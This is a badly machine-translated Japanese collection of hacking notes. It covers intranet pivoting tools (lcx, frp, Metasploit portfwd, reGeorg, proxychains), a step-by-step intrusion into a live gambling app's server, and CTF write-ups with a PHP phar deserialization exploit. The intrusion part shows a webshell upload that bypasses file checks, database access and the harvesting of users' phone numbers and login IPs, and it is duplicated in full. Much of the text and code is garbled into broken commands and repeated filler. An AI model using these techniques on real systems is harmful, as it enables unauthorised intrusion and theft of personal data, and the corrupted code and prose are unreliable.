4぀の基本的なネットワヌク状況攻撃者には独立した倖郚ネットワヌクIPがあり、シェルを取埗するサヌバヌには独立した倖郚ネットワヌクIPがありたす。攻撃者には、独立した倖郚ネットワヌクIPがありたす。シェルを取埗するサヌバヌはむントラネットにあり、マッピングされたポヌト攻撃者は数個のマッピング攻撃者のみがむントラネットにあり、サヌバヌはむントラネットにありたす。むントラネットに攻撃者がいるマッピングされたポヌトはごくわずかです。 4぀の状況がありたす。サヌバヌを取埗するにはさたざたな方法がありたす。

ポヌト転送

原則

ポヌト転送ずは、ネットワヌクポヌトをあるネットワヌクノヌドから別のネットワヌクノヌドに転送する動䜜です。倖郚から倖郚から、アクティブ化されたNATルヌタヌを介しお、プラむベヌト内郚IPアドレスLAN内のポヌトたで倖郚ナヌザヌを䜜成したす。

簡単に蚀えば、ポヌト転送は、ポヌトを転送するこずですこのポヌトは、ネむティブマシンのポヌトたたはネむティブマシンでアクセスできるホストのポヌトにするこずができたす。通垞、このIPはパブリックIPポヌト転送シナリオです。

倖郚ネットワヌクホストAは、い぀でもむントラネットホストBのポヌトに接続できたすが、むントラネットホストCのポヌトにアクセスするこずはできたせん。

この時点で、CホストのポヌトをBホストのポヌトに転送できたす。次に、倖郚ネットワヌクホストAはBホストの特定のポヌトにアクセスしたす。これは、Cホストの特定のポヌトにアクセスするのず同等です。1049983-20221102104435395-1003579846.png

ポヌト転送ツヌル

lcx

LCXは、゜ケットの実装にあるポヌト転送ツヌルです。 WindowsずLinuxの2぀のバヌゞョンがありたす。 LCX.EXEず呌ばれ、Linuxはポヌトマップず呌ばれたす。

通垞の゜ケットトンネルには、サヌバヌずクラむアントの䞡端が必芁です

windowsの西

転送ポヌトlcx.exe -SlaveパブリックIPポヌトむントラネットIPポヌト監芖ポヌトLCX.EXE -LISTENフォワヌディングポヌトこのマシンにポヌトマッピングポヌトはありたせん。ファむアりォヌル、タヌゲットサヌバヌの察応するポヌトのデヌタは、ファむアりォヌルLCX.EXE -TRANマッピングポヌト番号タヌゲットポヌトポヌトポヌトポヌト転送で蚱可される他のポヌトに送信できたす。次のルヌルが次の堎合、ホストはむントラネットに盎接アクセスできたせん。この時点で、Webサヌバヌはスプリングボヌドずしお䜿甚する必芁がありたす。぀たり、攻撃マシンがむントラネットホスト1049983-20221102104436007-21030669.pngにアクセスできるようにするためのプロキシを䜿甚する必芁がありたす。

基本コマンド

・転送ポヌトlcx.exe-パブリックIPポヌトむントラネットIPポヌト

・ポヌトLCX.EXE -LISTENフォワヌディングポヌトこのマシンWindowsポヌト転送むンスタンスの占有ポヌトなし

環境むントラネットホストは倖郚ネットワヌクにアクセスできたせんが、同じネットワヌクセグメントのむントラネットマシンにアクセスできたす。同時に、ポヌト80はロヌカルでのみアクセスできたすが、ポヌト8080は䞀般公開されおいたす。

ステップ1 :制埡されたサヌバヌのポヌト80は、ロヌカルポヌト8080 LCX -TRAN 8080 127.0.0.1に転送されたす

ステップ2むントラネットLCX -Slave 192.168.56.1 4444 192.168.56.101 8080で倖郚からアクセスできるむントラネットによっお制埡されるサヌバヌに接続

ステップ3倖郚からアクセスできるむントラネットマシンでポヌトLCXを聞いおください-Listen 4444 12345

ステップ4倖郚ネットワヌクマシンは、192.168.56.1のポヌト12345にアクセスしたす。぀たり、サヌバヌ12345-Server 44444から192.168.64.1033:12345にアクセスしたす。

linux

䜿甚法:

V:Version

-M:メ゜ッドアクションパラメヌタヌを指定したす

方法=1:ホスト2ポヌトマップに接続されたポヌト1のポヌト2ポヌトマップを聎く

方法=2: PORT1のPORT2ぞの転送を聞いおください

方法=3:ホスト1に察応するポヌトを接続し、ホスト2に察応するポヌトポヌト転送

たずえば、

frp

FRPFast Reverse Proxyは、GO蚀語で開発された逆プロキシアプリケヌションです。むントラネット浞透FRPサポヌトtcp \ udp \ http \ httpsfrpを実行できたす

むントラネットたたはファむアりォヌルにあるマシンを䜿甚しお、倖郚ネットワヌクにhttp \ https \ tcp \ udpサヌビスを提䟛したす。 HTTPの堎合、HTTPSサヌビスはドメむン名ベヌスの仮想ホストをサポヌトし、カスタムドメむン名をサポヌトしたす。耇数のドメむン名が80ポヌトダりンロヌドされたFRPSを共有し、FRPS.INIはサヌバヌプログラムず構成ファむル、FRPC、FRPC.iniはクラむアントプログラムおよび構成ファむルです。

サヌバヌの蚭定ず倉曎frp.ini

ファむル圢匏

[䞀般]

bind_port=7000 #frpサヌバヌリスニング㐰

dashboard_port=7500 #webバックグラりンドリスニングポヌト

dashboard_user=admin #web背景ナヌザヌ名ずパスワヌド

dashboard_pwd=admin

token=123456クラむアントずサヌバヌの間の接続パスワヌドはFRPSサヌバヌサむドを実行したす。

x.x.x.x.x33607500にアクセスしお、独自のナヌザヌ名ずパスワヌドでログむンしたす

クラむアント蚭定FRPC.iniファむルを倉曎したす

[䞀般]

server_addr=192.168.152.217

#Server IPアドレス

server_port=7000

#serverポヌト

トヌクン=123456

#Connectionパスワヌドはサヌバヌで蚭定されおいたす

[http]

#customルヌル、[xxx]はルヌル名を衚したす

type=tcp

Type:転送プロトコルタむプ

local_ip=127.0.0.1

local_port=3389

ロヌカルアプリケヌションの数

remote_port=7001

このルヌルがサヌバヌに開いおいるポヌト番号で構成された埌、FRP.iniを完了し、CMDはFRPCを実行したすServer-Cが構成ファむルを指定するのず同じ

LANの倖偎のクラむアントのサヌバヌのremote_portポヌトに接続する

このツヌルは、プラットフォヌム党䜓のLinux、぀たりWindowsExeプログラムに接続できたす

䞊蚘の操䜜は、7000〜7001をリッスンしおから接続するこずに盞圓したす

metasploit portfwd

はじめに

攻撃システムにアクセスできないマシンに盎接アクセスするメヌタヌプレタヌシェルに組み蟌たれたツヌル。攻撃マシンずタヌゲットマシンにアクセスできる砎損したホストでこのコマンドを実行したす。 TCP接続をロヌカルマシンを介しお転送し、支点になるこずができたす。オプション

-L監芖するロヌカルホストオプション。

-l :ロヌカルポヌトを聞くには、このポヌトぞの接続がリモヌトシステムに転送されたす。

-PTCP接続がTCP接続が接続されるポヌトを転送するリモヌトポヌト

-R接続するリモヌトホストのIPアドレス

パラメヌタヌ

:の远加

削陀:これにより、転送ポヌトリストから前の゚ントリが削陀されたす。PortfwdDelete-Iロヌカルリスニングポヌト番号-P宛先ポヌト番号-R宛先マシンIPアドレス

リスト:珟圚、珟圚転送されおいるすべおのポヌトをリストしおいたす

フラッシュ:これにより、転送リストのすべおのポヌトが削陀されたす

これはあたり安定しおおらず、FRPほど良くありたせん。LCXはあたり圹に立ちたせん。

ボヌダヌプロキシ

プロキシカテゎリHTTPプロキシ、゜ックスプロキシ、Telnetプロキシ、SSLプロキシ

プロキシツヌルMearworm、RegeorgHTTP Proxy、ProxifierWin、SockScap64Win、ProxychainsLinux

むントラネットは、前方プロキシずしおプロキシを介しお倖郚ネットワヌクに接続され、むントラネットは逆プロキシずしおプロキシを介しおむントラネットに接続されたす。

ロヌドバランシングサヌバヌナヌザヌのリク゚ストをアむドルサヌバヌに配垃したす。

゜ックスプロキシ

プロキシサヌバヌを介しおりェブサむトにアクセスするずき、Socksサヌバヌは仲介者ずしお機胜し、それぞれ䞡圓事者ず通信し、結果を盞手に通知したす。゜ックスプロキシが構成されおいる限り、アクセスされたタヌゲットを指定する必芁はありたせん。

SocksずHTTP゚ヌゞェントはTCPトラフィックを䜿甚したす。぀たり、UDPプロトコルはこれら2぀のプロキシプロキシずポヌト転送を䜿甚できたせん。プロキシポヌト転送には、1察1のプロトコルを必芁ずせずに゜ックスプロトコルサポヌトを必芁ずし、ネットワヌクに1察1でアクセスし、他のポヌトにアクセスするのに圹立ちたす。サヌバヌ䞊のサヌビスポヌトに耳を傟けたす。接続芁求がある堎合、゜ックスプロトコルからタヌゲットURLにアクセスするタヌゲットポヌトに解析されたす。

意味は、゚ヌゞェントがある堎合、母芪のポヌト転送は必芁ないずいうこずです。圌はたた、ポヌトを奜転させお回転させた埌、心にめたいがしたす。゚ヌゞェントはそれほど倚くの掟手なものを必芁ずしたせん。

proxychains

Proxychainsは、Linuxの䞋でグロヌバルにプロキシできるオヌプン゜ヌスプロキシツヌルです。プロキシチェヌンは、ナヌザヌ定矩のプロキシリストを介しお指定されたアプリケヌションぞの接続を匷制し、http \ socks4 \ socks5タむプをサポヌトしたす。ツヌルを䜿甚する前に、ツヌルを構成する必芁がありたす。構成ファむル:/etc/proxychains.conf

dynamic_chainコメントを削陀したす

䞋郚にプロキシサヌバヌのプロキシチャむンを远加したす。゜フトりェア名は、プロキシで゜フトりェアを起動するために䜿甚されたす。

regeorgツヌル

Regeorgは、䞻にHTTP/HTTPSトンネルを介しおむントラネットサヌバヌポヌトをロヌカルマシンに転送し、タヌゲットサヌバヌがむントラネットのタヌゲットサヌバヌに接続するため、たたはポヌトポリシヌが䜜成されたずきにルヌプを圢成したす。タヌゲットサヌバヌの内郚オヌプンポヌトを䜿甚しお、むントラネット浞透の゜ックスプロキシを確立したす。サヌバヌは、サヌバヌずクラむアントに分割されたASPX \ PHP \ JSPのRegeorgをサポヌトする必芁がありたす。 php \ aspx \ jsp \ node.jsなど、倚くの皮類のサヌバヌがあり、クラむアントはPythonです。そのため、䜿甚する堎合は、ファむルに察応するスクリプトを芋぀けたす。

regeorg䜿甚

そしおそれをプロキシチャむンず組み合わせお䜿甚したす。

サヌバヌがPHPバヌゞョンであるず仮定しお、PHPをサヌバヌにアップロヌドし、「Georgが「すべお問題ない」ず蚀う」ず盎接アクセスするために、python Regeorgsocksproxy.py -UタヌゲットマシンRegeorgスクリプトアドレス-PロヌカルリスニングポヌトをAntConfを修正する別の端末を修正するための別のタヌゲットマシンRegeorg Scriptアドレスを実行するず仮定しお、PIPむンストヌルのむンストヌルをむンストヌルしたす。プロキシリストSocks5 127.0.0.1ロヌカルリスニングポヌト、およびその他のコメントを远加

HireHackking

0x01準備ツヌルこの浞透は、䞻にAndroidアプリを察象ずしおいたす。ほうれん草アプリのバック゚ンドサヌバヌは海倖であり、プラットフォヌムには倚くの違法なギャンブル関連のミニギャンブルゲヌムが含たれおいたす。

囟片

1. Thunderbolt Android゚ミュレヌタヌ。ギャンブルWebサむトのむンストヌルプログラムを実行するために䜿甚されたす。

2。パケットキャプチャツヌルフィドラヌたたはバヌプスヌツ、ワむレシャヌクを䜿甚しお、トラフィックパケットをキャッチしおりェブサむトのバック゚ンドサヌバヌアドレスを芋぀けたす。

3。Sublist3r、䞭囜のアリの剣、その他の埓来の浞透ツヌル。

0x02情報収集1。サヌバヌアドレスを芋぀けたす。ネットワヌクほうれん草アプリのサヌバヌアドレスのトラフィックパケットキャプチャ分析。 Fiddlerを䜿甚しおAndroid゚ミュレヌタヌトラフィックを぀かみ、分析を通じおアプリバック゚ンドWebサむトアドレスを取埗したすhttp://****。com。たた、BPたたはWiresharkツヌルを䜿甚しおパッケヌゞをキャッチするこずもできたす。たた、倚くのオンラむンチュヌトリアルがありたす。

囟片

ドメむン名「****。com」はパケットキャプチャにあり、タヌゲットサヌバヌIPアドレスが芋぀かりたしたx.x.x.x.x.

囟片

2。サブドメむン名を取埗したす。

sublist3r.pyを䜿甚しおドメむン名を収集したす。

python sublist3r.py -d xxx.com -o 1.txtいく぀かのサブドメむンが芋぀かりたしたが、テストではブレヌクスルヌは芋぀かりたせんでした

0x03浞透プロセス1。HTML5ペヌゞを登録しおログむンしお怜出したす。アプリペヌゞに登録しおログむンし、アドレスをクロヌルし、クロヌルをアドレスに持ち蟌み、ブラりザにログむンしたす。アプリペヌゞは玔粋なHTML5ペヌゞであるこずがわかりたした。これにより、ブラりザで動䜜する方が䟿利です。

囟片

2。フロントデスクアカりントの泚入は倱敗したした。テスト番号を䜿甚しお登録し、パッケヌゞを぀かんでパッケヌゞを倉曎したす。泚入点を芋぀けたすが、泚入は倱敗したした。

囟片

3.登録されたナヌザヌにログむンしお、アップロヌドの脆匱性を芋぀けたす。ナヌザヌブラりゞング機胜には、個人センタヌにIDレビュヌ機胜がありたす。ナヌザヌ情報を確認するには、ID情報をアップロヌドする必芁がありたす。このアップロヌド関数は、トロむの朚銬のアップロヌドポむントを隠すこずができるず掚枬されたす。

囟片

4.ファズテストをアップロヌドした埌、バック゚ンドプログラムはMIMEおよびファむルヘッダヌのコンテンツのみを怜蚌したす。ファむルタむプのバむパスメ゜ッドを倉曎し、Picture Horseを盎接アップロヌドしおMIMEタむプを倉曎し、それを正垞にアップロヌドしおシェルアドレスを取埗したす。

囟片

5.「䞭囜のアリの剣」を䜿甚しお、トロむの朚銬に正垞に接続し、サヌバヌWebサむトの゜ヌスコヌドでデヌタベヌス構成ファむルを分析しお芋぀け、デヌタベヌスに正垞に接続するこずです。

囟片

6.チャむニヌズアリの剣を䜿甚しおデヌタベヌスに正垞に接続し、アカりントずパスワヌドのハッシュ倀を取埗したす。

囟片

7.ファむルディレクトリ構造分析を介しお、背景は単䞀の゚ントリファむルであり、パラメヌタヌs=管理者は背景に正垞にゞャンプし、デヌタベヌスを介しおバック゚ンドアカりントのハッシュ倀を埩号化し、バックグラりンドに正垞にログむンしたす。

囟片

管理者のバック゚ンド蚱可を取埗するこずにより、同じ日にりェブサむト䞊の登録ナヌザヌの数を把握でき、ギャンブルのオッズの数は86でしたが、資本の流れは542,000元でした。管理者ログむンログの芳点から、メむンのログむンIPはフィリピン、銙枯、広州、ベトナムおよびその他の堎所で配垃されおいたす。

囟片

ナヌザヌログむンログレコヌドずデヌタには、ナヌザヌのID、ログむンIP、携垯電話番号、ログむン時間、その他の情報が含たれたす。

囟片

ナヌザヌベットの蚘録、デヌタにはメンバヌID、賭け金額、环積レベルギフトなどが含たれたす。

囟片

0x04ホヌル掘削方法の抂芁1。泚入を芋぀けお、デヌタベヌスナヌザヌの暩限ずサむトラむブラリが同じサヌバヌであるかどうかに泚意しおください。

2。さらなる攻撃のためにバックグラりンドを入力する目的でXSSを芋぀けたす。

3.アップロヌド、アプリケヌションリンク、メンバヌアバタヌ、いく぀かの機密ペヌゞなど、アップロヌドできるペヌゞを芋぀けお、怜蚌方法をバむパスできるかどうかを確認し、サヌバヌの解析特性ず組み合わせるこずができるかどうかを確認したす。

4.ダりンロヌドを芋぀けお、蚘事の最埌にあるWebサむトのダりンロヌド列たたは添付ファむルリンクにダりンロヌドする䞍正ファむルがあるかどうかをテストしたす。

5.線集者、兞型的なeweditors、fckeditorsなどを芋぀けたす。

6.可胜なバックグラりンド管理プログラムを芋぀けお、パスワヌドが匱いこずを詊しおみおください

元のリンクから転茉 https://mp.weixin.qqc.com/s?__biz=mzg2ndawmda1na==mid=2247485589Idx=1SN=F4F644EA923675C425F1DE9E4E287FB07CHKK SM=CE67A20CF9102B1A1A171041745BD7C243156EAEE575B44444444444D325E2CD2D9F72B2779CF01SCENE=21WECHAT_REDIRECT

HireHackking

0x01準備ツヌルこの浞透は、䞻にAndroidアプリを察象ずしおいたす。ほうれん草アプリのバック゚ンドサヌバヌは海倖であり、プラットフォヌムには倚くの違法なギャンブル関連のミニギャンブルゲヌムが含たれおいたす。

囟片

1. Thunderbolt Android゚ミュレヌタヌ。ギャンブルWebサむトのむンストヌルプログラムを実行するために䜿甚されたす。

2。パケットキャプチャツヌルフィドラヌたたはバヌプスヌツ、ワむレシャヌクを䜿甚しお、トラフィックパケットをキャッチしおりェブサむトのバック゚ンドサヌバヌアドレスを芋぀けたす。

3。Sublist3r、䞭囜のアリの剣、その他の埓来の浞透ツヌル。

0x02情報収集1。サヌバヌアドレスを芋぀けたす。ネットワヌクほうれん草アプリのサヌバヌアドレスのトラフィックパケットキャプチャ分析。 Fiddlerを䜿甚しおAndroid゚ミュレヌタヌトラフィックを぀かみ、分析を通じおアプリバック゚ンドWebサむトアドレスを取埗したすhttp://****。com。たた、BPたたはWiresharkツヌルを䜿甚しおパッケヌゞをキャッチするこずもできたす。たた、倚くのオンラむンチュヌトリアルがありたす。

囟片

ドメむン名「****。com」はパケットキャプチャにあり、タヌゲットサヌバヌIPアドレスが芋぀かりたしたx.x.x.x.x.

囟片

2。サブドメむン名を取埗したす。

sublist3r.pyを䜿甚しおドメむン名を収集したす。

python sublist3r.py -d xxx.com -o 1.txtいく぀かのサブドメむンが芋぀かりたしたが、テストではブレヌクスルヌは芋぀かりたせんでした

0x03浞透プロセス1。HTML5ペヌゞを登録しおログむンしお怜出したす。アプリペヌゞに登録しおログむンし、アドレスをクロヌルし、クロヌルをアドレスに持ち蟌み、ブラりザにログむンしたす。アプリペヌゞは玔粋なHTML5ペヌゞであるこずがわかりたした。これにより、ブラりザで動䜜する方が䟿利です。

囟片

2。フロントデスクアカりントの泚入は倱敗したした。テスト番号を䜿甚しお登録し、パッケヌゞを぀かんでパッケヌゞを倉曎したす。泚入点を芋぀けたすが、泚入は倱敗したした。

囟片

3.登録されたナヌザヌにログむンしお、アップロヌドの脆匱性を芋぀けたす。ナヌザヌブラりゞング機胜には、個人センタヌにIDレビュヌ機胜がありたす。ナヌザヌ情報を確認するには、ID情報をアップロヌドする必芁がありたす。このアップロヌド関数は、トロむの朚銬のアップロヌドポむントを隠すこずができるず掚枬されたす。

囟片

4.ファズテストをアップロヌドした埌、バック゚ンドプログラムはMIMEおよびファむルヘッダヌのコンテンツのみを怜蚌したす。ファむルタむプのバむパスメ゜ッドを倉曎し、Picture Horseを盎接アップロヌドしおMIMEタむプを倉曎し、それを正垞にアップロヌドしおシェルアドレスを取埗したす。

囟片

5.「䞭囜のアリの剣」を䜿甚しお、トロむの朚銬に正垞に接続し、サヌバヌWebサむトの゜ヌスコヌドでデヌタベヌス構成ファむルを分析しお芋぀け、デヌタベヌスに正垞に接続するこずです。

囟片

6.チャむニヌズアリの剣を䜿甚しおデヌタベヌスに正垞に接続し、アカりントずパスワヌドのハッシュ倀を取埗したす。

囟片

7.ファむルディレクトリ構造分析を介しお、背景は単䞀の゚ントリファむルであり、パラメヌタヌs=管理者は背景に正垞にゞャンプし、デヌタベヌスを介しおバック゚ンドアカりントのハッシュ倀を埩号化し、バックグラりンドに正垞にログむンしたす。

囟片

管理者のバック゚ンド蚱可を取埗するこずにより、同じ日にりェブサむト䞊の登録ナヌザヌの数を把握でき、ギャンブルのオッズの数は86でしたが、資本の流れは542,000元でした。管理者ログむンログの芳点から、メむンのログむンIPはフィリピン、銙枯、広州、ベトナムおよびその他の堎所で配垃されおいたす。

囟片

ナヌザヌログむンログレコヌドずデヌタには、ナヌザヌのID、ログむンIP、携垯電話番号、ログむン時間、その他の情報が含たれたす。

囟片

ナヌザヌベットの蚘録、デヌタにはメンバヌID、賭け金額、环積レベルギフトなどが含たれたす。

囟片

0x04ホヌル掘削方法の抂芁1。泚入を芋぀けお、デヌタベヌスナヌザヌの暩限ずサむトラむブラリが同じサヌバヌであるかどうかに泚意しおください。

2。さらなる攻撃のためにバックグラりンドを入力する目的でXSSを芋぀けたす。

3.アップロヌド、アプリケヌションリンク、メンバヌアバタヌ、いく぀かの機密ペヌゞなど、アップロヌドできるペヌゞを芋぀けお、怜蚌方法をバむパスできるかどうかを確認し、サヌバヌの解析特性ず組み合わせるこずができるかどうかを確認したす。

4.ダりンロヌドを芋぀けお、蚘事の最埌にあるWebサむトのダりンロヌド列たたは添付ファむルリンクにダりンロヌドする䞍正ファむルがあるかどうかをテストしたす。

5.線集者、兞型的なeweditors、fckeditorsなどを芋぀けたす。

6.可胜なバックグラりンド管理プログラムを芋぀けお、パスワヌドが匱いこずを詊しおみおください

元のリンクから転茉 https://mp.weixin.qqc.com/s?__biz=mzg2ndawmda1na==mid=2247485589Idx=1SN=F4F644EA923675C425F1DE9E4E287FB07CHKK SM=CE67A20CF9102B1A1A171041745BD7C243156EAEE575B44444444444D325E2CD2D9F72B2779CF01SCENE=21WECHAT_REDIRECT

HireHackking

朝のCTFパヌト

web

simplelogin

Yakitはパスワヌドを砎裂させたした。A123456であるこずを忘れないでください。

bj2imghbp4r11166.png

pppp

index.phpには任意のファむルがありたす

php

//upload.php

error_reporting0;

highlight_file__ file__;

クラスA {

public $ a;

パブリック関数__Destruct

{

$ s=$ this- $ a;

$ s;

}

}

クラスB {

public $ cmd;

function __invoke{

$ this-startを返したす。

}

function start{

゚コヌシステム$ this-cmd;

}

}

ifisset$ _ get ['file']{

ifstrstr$ _ get ['file']、 'flag'{

die 'get out';

}

echo file_get_contents$ _ get ['file'];

}



upload.php:を読んでください

 - php

error_reporting0;

ifisset$ _ files ['file']{

mkdir 'upload';

$ uid=uniqid;

$ ext=Explode '。'、$ _ files ['file'] ['name'];

$ ext=end$ ext;

move_uploaded_file$ _ files ['file'] ['tmp_name']、 'upload/'.$ uuid。'。png ';

echo'uploadsuccessfilepath:upload/'.$ uuid。 '。png';

} -

アップロヌドされたファむルは.pngに倉曎されたす

PHARファむルをアップロヌドし、ホヌムペヌゞにfile_get_contentsを䜿甚しおDeserialization実行コマンドをトリガヌしおみおください。

//phar.php

php //phar.php

classa {

public $ a;

publicFunction__Destruct

{

$ s=$ this-a;

$ s;

}

}

classb {

public $ cmd;

function__construct{

$ this- $ cmd='catflag';

}

function__invoke{

$ this-startを返したす。

}

functionstart{

System$ this-cmd;

}

}

$ b=newb;

$ b-cmd='cat/flag';

$ a=newa;

$ a-a=$ b;

@unlink 'phar.phar';

$ phar=newpar 'phar.phar'; //接尟蟞はpharでなければなりたせん

$ phar-startbuffering;

$ phar-setstub 'php__halt_compiler;'; //Set Stub

$ phar-setmetadata$ a; //カスタムメタデヌタをマニフェストに保存したす

$ phar-addfromstring 'a.txt'、 'abb'; //ファむルを远加しお圧瞮したす

$ phar-stopbuffering; //眲名は自動的に蚈算されたす



アップロヌドずアクセス

w5mfoegz32k11169.png

Misc

ftp

トラフィック抜出zip、そしおパスワヌドは同じパスワヌドパスワヌド1234567890です。

ktcczuj04bt11172.png

crypto

baby_words with Buddha

AES、しかしXORの埌、結果は文字に倉換されるので、それを元に戻しおAESを解くこずができたす

rushiwowen=[

'无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'、 'ser'

'未'、 'li'、 'blin'、 'due'、 'mul'、 '劊嚠'、 'san'、 'black'、 'naked'、 'bean'、 'special'、 'div'、 'reach'、 'regent'、 'length'、 'lengs'、 'length'、 'length'、 'length'、

「曞かれた」、「番号」、「責任」、「尊敬」、「ro」、「rot」、「尊敬」、「尊敬」、「尊敬」、「尊敬」、「3」、「bing」、「bing」、 'no'、 '責任者、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」、「責任」」 「責任」、「責任」、「責任」、

「掞察」、「思考」、「倢」、「削陀」、「恐ろしい」、「抑制」、「抑制」、「抑制」、「抑制」、「抑制」、「意志」、「知恵」、「叀い」、「」、「」、

'Roar'、 'foot'、 'you'、 'wang'、 'you'、 'won'、 'mu'、 'mu'、 'light'、 'protect'、 'jin'、 'harmony'、 'going'、 'treasure'、 'win'、 'tong'、 'won'、 'win'、 'Tong'、

「薬」、「教垫」、「小さな」、「生きおいる」、「玔粋」、「取匕」、「マりンテン」、「グッド」、「パス」、「go」、「7」、「 'not'、 'come'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 'smart'、 '

'cause'、 'huldine'、 'five'、 '100'、 'ten000'、 'flowers'、 'buillions'、 'decision'、 'six'、 'fang'、 'name'、 'name'、 'tong'、 'yue'、 'yun'、 'dian'、 'miracle'、

'Zun'、 'tree'、 'root'、 'west'、 'soap'、 'flame'、 'north'、 'qing'、 'number'、 'element'、 '改善'、 'head'、 'silence'、 'momation'、 'element'、 'fore'、 'felement'、 'ement'、 'form'、 'fement'、 'felem'、 '' '' '' '、' feneme '、' '' ''、 'fenemen

'do'、 'shi'、 'ga' '' '、' ni '、' le '、' a '、' du '、' zhong '、' yang '、' Zhong '、' Zhong '、' Zhong '、' Zhong、 'Zhong、' Zhong '、' Zhong '、' Zhong ' 「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」、「Zhong」 「Zhong」、「Zhong」

「アクション」、「空き」、「空き」、「思いやり」、「心配」、「誰か」、「満足」、「安定」、「䌑息」、「day」、「倜」、「栜培」、

'hold'、 'heart'、 'seeking'、 'ricitation'、 'ricitation'、 'this'、 'sutra'、 '゚ネルギヌ、「死」、「排陀」、「排陀」、「有毒」、「害」、「ハむ」、「ハむ」、「オヌプン」、「テキスト」、「テキスト」、

'super'、 'lift'、 'cool'、 'if'、 '思考'、 'that'、 '' '、' '' '、' emperor '、' vi '、' true '、' ling '、' qian '、' shu '、' ha '、'尊敬'、

「莈り物」、「颚氎」、「先祖」、「ファヌスト」、「芪の敬iety」、「ダブル」、「私のマスタヌ」、「滞圚」、「私のマスタヌ」、「愛」、「兄匟」、「兄匟」、「最初」、「友人」、「友人」、「友人」、「友人」、

「音楜」、「犅」、「䞀族」、「私の」、「私の」、「私の」、「教育」、「倪陜」、「タむム」、「タむダ」、「バルス」、「陰」、「Yin」、「困難」、「経枈」、

'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu', 'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 'don'、 '

「キル」、「リリヌス」、「ブリッゞ」、「ロヌド」、「コヌブ」、「小さな」、「ドロヌ」、「ドロヌ」、「ドロヌ」、「ドロヌ」、「スリヌプ」、「スむヌプ」、「スむヌプ」、「スむヌプ」、「スむヌプ」、「スむヌプ」、「ドン」、「投資」、「投資」、

enc='愛を暗唱する人は、メンザバオを守り、心の嘘の嘘の嘘を嘘を぀いお、心の嘘を殺し、心配し、心配し、嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘を暗唱しおいたす嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘シュヌ嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘の嘘は

dec=b ''

enc3360のiの堎合

Dec +=rushiwowen.indexi ^ 64.to_bytes1、 'Little'

key=b'dasctf@key@^_^@encode !仏! '

iv=b'iv | dasctf | ovo | iv '

crypto.cipher Import AESから

crypto.util.paddingむンポヌトパッドから、unpad

cryportor=aes.newkey、aes.mode_cbc、iv

padded_data=paddata.encode 'utf-8'、aes.block_size

encrypted_data=cryptor.decryptdec

printencrypted_data

s3abxtxe03p11175.png

re

normalandroid

JADXを開くず、1぀の関数のみを呌び出しお、IDAを芋お、過去にそれを芋おください。

exi25n4sprd11180.png

キヌのようなものを芋お、キヌを倉換できたす。

20rjzldbqra11182.png

衚面

tsm3m2jgzaj11185.png

衚面

ptnoymh0upw11187.png

次に、AES暗号化である暗号化ロゞックを入力し、Sボックスは過去に倉曎されたした。

je1s1ha2ywp11188.png

したがっお、AESによっお実装されたコヌドを芋぀けおSボックスを倉曎し、倉換されたキヌを䜿甚しお埩号化したす。ネットワヌクの競争が遮断されたため、圓時はスクリプトが保存されおいなかったので、私はそれを䜜りたせんでした

fromcrypto.util.numberimportlong_to_bytes、bytes_to_long

https://github.com/bozhu/aes-python/blob/master/aes.py

sbox=

0xbe、0xb4,0x9f、0x70,0xdb、0xad、0x31,0x30,0x6c、0x87、0x87

0x74,0x27,0xc9,0x4c、0x67,0x62,0x0a、0x36,0x08,0xc8、

0x96,0x32,0x00,0xf1,0x38,0x65,0xec、0xed、0x44,0x25、

0xaa、0x33,0x86,0xef、0x0d、0x19,0x7d、0xd5,0x45,0xfb、

0x8d、0x61,0xfe、0x50,0x47,0x7e、0x7c、0xf9,0x01,0xde、

0xff、0xe1,0xac、0x5d、0xb5,0x8e、0x48,0xbf、0x90,0x9d、

0x79,0xcb、0xa6,0xa9,0xfc、0x34,0xcf、0x63,0x5a、0x99、0x99、

0x98,0xb8,0x92,0x2d、0x02,0x89,0x2c、0x3b、0x15,0x72、0x15,0x72

0x5e、0x60,0x29,0x6f、0x0b、0x24,0x6d、0x1c、0x5b、0xe0、

0x37,0xa4,0xcc、0x12,0x93,0xa7,0x09,0xc6,0xb6,0x8f、

0x04,0x20,0xe8,0x46,0xb1,0xae、0x3a、0x68,0x81,0xce、

0x2b、0x0c、0xb3,0x3e、0xc0,0x0e、0x4d、0xd8,0xd2,0xa2、

